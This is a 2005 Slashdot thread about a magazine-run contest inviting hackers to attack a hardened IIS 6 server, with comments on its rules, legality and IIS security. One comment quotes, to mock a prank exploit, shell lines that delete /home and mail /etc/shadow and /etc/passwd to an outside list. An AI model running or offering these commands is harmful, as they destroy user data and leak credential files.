
Hack IIS6 Contest 545

Posted by CmdrTaco
from the get-your-crackz0r-on dept.
ThePurpleBuffalo writes "This just came in across a BugTraq mailing list from Roger Grimes: 'Starting May 2nd and going until June 8th, the server located at http://www.hackiis6.com/ will welcome hackers to attack it. If you can deface the web site or capture the "hidden" document, you win an X-box! Read contest rules for what does and doesn't constitute a successful hack. We've tried to be as realistic as possible in what constitutes a successful hack, and in mimicking a basic HTML and ASP.NET web site.'"

  • Re:Physical Access (Score:4, Informative)

    by Medgur (172679) on Thursday May 05, 2005 @03:13PM (#12444358) Homepage
    From TFA:
    "A successful hack does not include:
    1. External denial of service attack against web server computer, or any participating vendor, or device. Denial of service attacks due to successfully modified content on web server computer are fair game.
    2. Attacks or modifications of any computer or device besides web server or database computers.
    3. Attacks involving external domain naming services.
    4. Publishing readily available directory or file listings without accessing or modifying files on the web server or database computer.
    5. Physical attacks."
  • by thrill12 (711899) * on Thursday May 05, 2005 @03:15PM (#12444387) Journal
    A successful hack does not include:

    1. External denial of service attack against web server computer, or any participating vendor, or device. Denial of service attacks due to successfully modified content on web server computer are fair game.


    They counted on that one :)
  • by maotx (765127) <maotx.yahoo@com> on Thursday May 05, 2005 @03:22PM (#12444482)
    The site is down so here is the original e-mail he sent out.

    Welcome to the HackIIS6.com Contest!

    Starting May 2nd and going until June 8th, the server located at
    http://www.hackiis6.com/ [hackiis6.com] will welcome hackers to attack it. If you can
    deface the web site or capture the "hidden" document, you win an X-box!
    Read contest rules for what does and doesn't constitute a successful
    hack. We've tried to be as realistic as possible in what constitutes a
    successful hack, and in mimicking a basic HTML and ASP.NET web site.

    For the most part, almost anything reasonable constitutes a successful
    attack except for a massive network denial of service attack against the
    IIS 6 or its host provider. Not that doing a successful DoS attack
    wouldn't be a problem in the real world...it would be...but we aren't
    testing that. We want to test the security of Windows Server 2003, IIS,
    and other Microsoft applications. So, please, respect this one rule of
    the contest so everyone can have a chance at claiming the prize.

    Questions and Prizes
    If you have questions, send an email to admin@hackiis6.com. If you want
    to claim a prize, send your email, with the details listed in the
    official rules to prizes@hackiis6.com.

    Contest Summary
    We are going to start the contest for the first two weeks with the very
    basic, static HTML web site that you are now reading. Two weeks later,
    we'll add an ASP.NET web site and a back-end SQL server to add more
    flavor and give more area to attack. We started with the basic site to
    prove that Microsoft's Internet Information Service (IIS) and Windows
    Server 2003 is secure by itself. This is to satisfy the purists who
    think hacking ASP.NET is hacking an application and not the server.
    So, if you've got skillz in one area versus the other, you'll have a
    chance to try both attack types.

    Once the contest stops on June 8th, we will announce the winner(s) at
    the upcoming June Microsoft Tech.Ed conference.

    The Setup
    This server is running Windows Server 2003, Service Pack 1, with all
    current publicly-released patches and hotfixes installed (we ran Windows
    Update and MBSA just like a real admin would do). We installed IIS 6.0,
    and then we followed the basic recommendations
    (http://www.microsoft.com/technet/security/prodtech/IIS.mspx [microsoft.com]) suggested
    by Microsoft. I added a few tweaks here and there, to put my personal
    mark on the site, but nothing extraordinary.

    There is no non-Microsoft software involved with the exception of the
    host's router/firewall, which would be normal in most environments. We
    want to make this a test of Microsoft software.

    Why a hacking contest?
    To have fun! Sure there will be critics who say sponsoring a hacking
    contest proves nothing. If the IIS server remains unbroken, it still
    doesn't mean that IIS is really "secure." True, and if I wasn't the
    contest's team leader, I'd probably be the first one to yell that out.
    Hacking contests rarely prove something is secure, although it only
    takes a single successful hack to prove something is unsecure.

    So why do it? There are very few places on the Internet where hackers,
    good and bad, can hack legally. Windows IT Pro thought the contest would
    be a fun way to interact with the hacker community (they realize most
    hackers have good intentions) and bring some attention to Windows IT Pro
    (of course, they'll disavow all responsibility and blame me solely if
    the server gets hacked).

    So, welcome to the contest! Hack away. If the IIS server goes unhacked
    during the extended time period, it might not mean that IIS is
    "unhackable", but if it does survive the contest it might convince a few
    people that it is a relatively secure web server platform. After all,
    over 20% of the Internet relies on it, including some of the largest web
    sites in the world.

    Happy Hacking,

    Roger A. Grimes
    Contributing editor, Windows IT Pro Magazine
  • "The Fallacy of Cracking Contests" by Bruce Schneier: The Fallacy of Cracking Contests [schneier.com]

    In short, if it's broken, that's valuable. If it isn't broken in the time allotted, on the other hand, that doesn't mean it's secure.

  • by Quila (201335) on Thursday May 05, 2005 @03:32PM (#12444587)
    The laws are about unauthorized access. These guys just gave you authorization.
  • Re:Physical Access (Score:1, Informative)

    by stedo (855834) on Thursday May 05, 2005 @03:32PM (#12444592) Homepage
    Hacking with physical access is not hacking. If you can get close enough to pull the plug out of the wall and stick in some live cd (e.g. knoppix) then you can do whatever you want, no matter what OS it is. If the OS isn't running, it can't do jack to protect your data.
  • Re:Hmm.. (Score:3, Informative)

    by joeldg (518249) on Thursday May 05, 2005 @03:36PM (#12444631) Homepage
    here is what those vars are...

    shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe"
    launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk "
    netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk"

    yea.. run that!

  • Re:Hack? Or crash? (Score:2, Informative)

    by The Bungi (221687) <thebungi@gmail.com> on Thursday May 05, 2005 @03:42PM (#12444704) Homepage
    pPh3^R Slashdot's official 'hacker', he can't tell the difference between IIS and IE.
  • by LupusUF (512364) on Thursday May 05, 2005 @03:44PM (#12444727)
    Sadly, you don't get the xbox if you put up anything obscene (or advertise any product).
  • Several things (Score:3, Informative)

    by Safety Cap (253500) on Thursday May 05, 2005 @04:04PM (#12444943) Homepage Journal
    What makes IIS inherently more difficult to secure than Apache or any other web server?
    It comes out of the box with all manner of unnecessary things turned on.

    It uses OS-level functions and system calls ("tightly integrated"), so when you hack IIS, you pwn the box, too.

    Apache requires you to read the documentation and crack the httpd.conf with a text editor in order to change stuff. This ensures that you are at least one evolutionary level above blind, one-armed chimp, which is the only required level to use the mouse and click-click-click on the Internets MMC configurator for IIS. At a minimum, Apache web admins are *slightly* more talented than IIS admins (unfortunately, there are lots of stupid admins out there, no matter the flavor).

    It was never written for security first, but rather just doing stupid monkey tricks with IE, serving static HTML and (studder) running VB COM objects as CGIs...

  • admin@hackiis6.com (Score:2, Informative)

    by sjasja (694035) on Thursday May 05, 2005 @04:05PM (#12444951)
    # nslookup
    > set ty=mx
    > hackiis6.com
    Non-authoritative answer:
    hackiis6.com MX preference = 10, mail exchanger = hostmaster1.local.banneretcs.com

    Hee hee, MS didn't have the cojones to put the mail server on hackiis6.com.

    How to secure MS software: run as little of it as possible.

  • Re:and done. (Score:5, Informative)

    by cduffy (652) <charles+slashdot@dyfis.net> on Thursday May 05, 2005 @04:08PM (#12444992)
    The relevant laws are against unauthorized access. By inviting you to hack their box, they authorized you. No reason to be paranoid.
  • by Omniscientist (806841) <matt AT badecho DOT com> on Thursday May 05, 2005 @04:43PM (#12445405) Homepage
    Look again [netcraft.com]

    They just switched to IIS 6.0 yesterday, actually.

  • by Anonymous Coward on Thursday May 05, 2005 @05:02PM (#12445638)
    I thought about that as well, but:

    A successful hack does not include:
    ...
    3. Attacks involving external domain naming services.
  • by Anonymous Coward on Thursday May 05, 2005 @05:23PM (#12445845)
    This is not an easy contest because the site has no interactive content, no remote admin console, the server doesn't have any extraneous services listening on random ports, no database driven content, etc. etc. etc.

    For sure. I've been messing with it for the last hour. It's a very lame subset of HTTP that's being supported, no head requests, no compression, no HTTP 1.0 etc. It's doing the equivalent of a 20 line perl script. However, they say they'll be adding ASP later on in May. That could be more fun...
  • Re:Several things (Score:3, Informative)

    by rainman_bc (735332) on Thursday May 05, 2005 @07:55PM (#12447146)
    lol I did that! I set up a reverse proxy for fun, and I left the proxy open to the whole www...

    I saw strange requests in my logs all of a sudden to doubleclick. People were making money off my open proxy... haha woops!
  • by Anonymous Coward on Thursday May 05, 2005 @10:44PM (#12448116)
    Pleasure to be Slashdotted

    Let's see if I can answer some questions from the previous posts:

    1. We only offered an Xbox vs. $1M in prize money because we are a magazine company and not Bill Gates' private charity. I came up with the idea so people could have a little fun and just getting the site up cost a bit of money...so the prize had to be limited.

    2. The only reason we ask for 24 hours of silence if you hack the site is to give the time for the admins to actually notice (i.e. wake up, check email), evaluate the proposed success, and to announce the winner ourselves. It's our contest, we wanted the "glory".

    We certainly aren't going to fix any bugs secretly and MS certainly can't fix any bugs in 24 hours (because of regression testing and things like that).

    3. I'm sure we would tell MS about any successful hacks, but I assure you it's far from the contest's intent. It's to learn how well a standard tightened IIS box holds up under a sustained attack without any foreign hardware or uber experts involved. I'm a Windows security "expert", but my expertise is not in IIS by any stretch of the imagination. I can barely spell it.

    4. Yes, more than likely if someone has some nifty zero day exploit they won't waste it for an X-box...but they might for the "glory" and Slashdot fame. A black hat wouldn't but a white or gray hat might.

    5. MS isn't widely involved in this contest...and they certainly aren't out to use it to collect new bugs. If anything, there is zero upside for them and a whole lot of downside. If the site survives for 4 weeks without a successful hack, I doubt Slashdot will even rate it a single post, but if it gets hacked...it will be on every major mail list.

    6. Yes, MX record was hosed...it was fixed within 15 minutes of someone emailing me (at my other email address). I had tested the email system and it worked...but it turns out my Exchange server was basically re-routing my test mails internally instead of creating a true test like I thought. Dork-geek of me. I learned something new today.

    7. I would love the Slashdot community to put up a GNU/Linux or other OSS web server (or I think there may be others out there already...)...so all parts of the community can have fun.

    It's interesting...I put up a web site for beginning hackers to have fun with and somehow it results in conspiracy theories and negative comments...

    Roger A. Grimes
    roger@banneretcs.com
  • by acz (120227) <zNO@SPAMhert.org> on Friday May 06, 2005 @02:15AM (#12448998) Homepage
    You have to be retarted to use an 0day IIS exploit to win an XBox when you can sell it for around 20K or impress customers during a pen test... (A pen test can be worth between 15K to 200K depending on the scope of the project).

    One hour of security consulting earns you an XBox, why bother with this contest?

    Link to post on vuln sharing club, here [immunitysec.com]
  • by cybermint (255744) on Friday May 06, 2005 @02:44AM (#12449092)
    This contest will not be taken seriously by anyone with significant skill or knowledge. This server has been made relatively "secure" by implementing all procedures and patches which are readily available. This may fix all known vulnerabilities, protecting it from the script kiddies, but doesn't fix those which have not been made public. An unfixed, non-public exploit is worth much, much more on the black market than a lousy x-box.

    Put up a large enough prize and that server will be compromised without a doubt. The same goes for Apache or any other alternative.
